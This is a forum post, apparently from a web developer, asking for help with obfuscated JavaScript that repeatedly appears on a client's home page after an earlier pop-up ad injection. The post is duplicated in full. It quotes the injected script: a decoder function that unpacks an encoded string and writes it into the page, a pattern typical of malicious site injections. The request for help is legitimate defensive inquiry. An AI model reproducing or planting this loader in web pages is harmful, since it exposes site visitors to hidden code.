K
ken.roberts
Hello,
I'm hoping someone might help us understand the code listed below.
One of our clients has been having unknown Javascript appear in their
home page.
The client swears that they are not changing the page and we have been
on vacation since we last removed the first 'unknown' code.
The following code appears this week on their site:
<script language=JavaScript>function decrypt_p(x){var
l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,25,32,12,23,26,22,33,27,8,0,0,0,0,0,0,51,44,41,20,46,52,18,42,0,49,29,60,50,11,36,13,48,35,15,10,55,34,56,37,57,21,39,0,0,0,0,3,0,2,30,61,14,31,1,62,19,7,58,16,54,9,45,5,17,6,47,59,24,40,38,28,4,43,53);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(165^w&255);w>>=8;s-=2}else{s=6}}document.write(r)}}decrypt_p("rvBcveRszie7mhKLa_OIa_3vigdIhhAcqeO@Yic786VExeJ7ienLF8OP4rdI9_3vMhKE3M3IpyKzMFwzYrdI9_AZoLKPolVI4yAE6_Kzyh3LHQmviUd@qenL6yKPp49sMiOP4r3Pp49VJ4JLSeOP4e9QojJ7oSO@MiALFruzphwEk8OviqDLM_K7b6t7fyAIkQ3PMicUFeO@p_wQavmsQeRXu_b7Mh3LHQX7zhAPH8DLMiOI3r3P4et76enItbt@piJzeGuUF8cPaRwPaeJEwTAP_iKUM_wESFwPhytWFSBUfRKPay9@Mi3PJrtzO4c7oSO@fiJ@tb9Wi6t@H@APOiOviFX7odKzxQ3PiyKzf_KztbtWiD1vSLgVThdj2rB23jml1GucveRszi0v")</script>
Has anyone seen this before? I did a quick search and it mentioned
somehting about it being and encryption technique.
Previously we had a script that called pop-up ads. We removed that, 3
days later (from server logs) this appeared.
Could the hosting company be compromized?
Any information or insight is much appreciated.
Cheers,
Ken
I'm hoping someone might help us understand the code listed below.
One of our clients has been having unknown Javascript appear in their
home page.
The client swears that they are not changing the page and we have been
on vacation since we last removed the first 'unknown' code.
The following code appears this week on their site:
<script language=JavaScript>function decrypt_p(x){var
l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,25,32,12,23,26,22,33,27,8,0,0,0,0,0,0,51,44,41,20,46,52,18,42,0,49,29,60,50,11,36,13,48,35,15,10,55,34,56,37,57,21,39,0,0,0,0,3,0,2,30,61,14,31,1,62,19,7,58,16,54,9,45,5,17,6,47,59,24,40,38,28,4,43,53);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(165^w&255);w>>=8;s-=2}else{s=6}}document.write(r)}}decrypt_p("rvBcveRszie7mhKLa_OIa_3vigdIhhAcqeO@Yic786VExeJ7ienLF8OP4rdI9_3vMhKE3M3IpyKzMFwzYrdI9_AZoLKPolVI4yAE6_Kzyh3LHQmviUd@qenL6yKPp49sMiOP4r3Pp49VJ4JLSeOP4e9QojJ7oSO@MiALFruzphwEk8OviqDLM_K7b6t7fyAIkQ3PMicUFeO@p_wQavmsQeRXu_b7Mh3LHQX7zhAPH8DLMiOI3r3P4et76enItbt@piJzeGuUF8cPaRwPaeJEwTAP_iKUM_wESFwPhytWFSBUfRKPay9@Mi3PJrtzO4c7oSO@fiJ@tb9Wi6t@H@APOiOviFX7odKzxQ3PiyKzf_KztbtWiD1vSLgVThdj2rB23jml1GucveRszi0v")</script>
Has anyone seen this before? I did a quick search and it mentioned
somehting about it being and encryption technique.
Previously we had a script that called pop-up ads. We removed that, 3
days later (from server logs) this appeared.
Could the hosting company be compromized?
Any information or insight is much appreciated.
Cheers,
Ken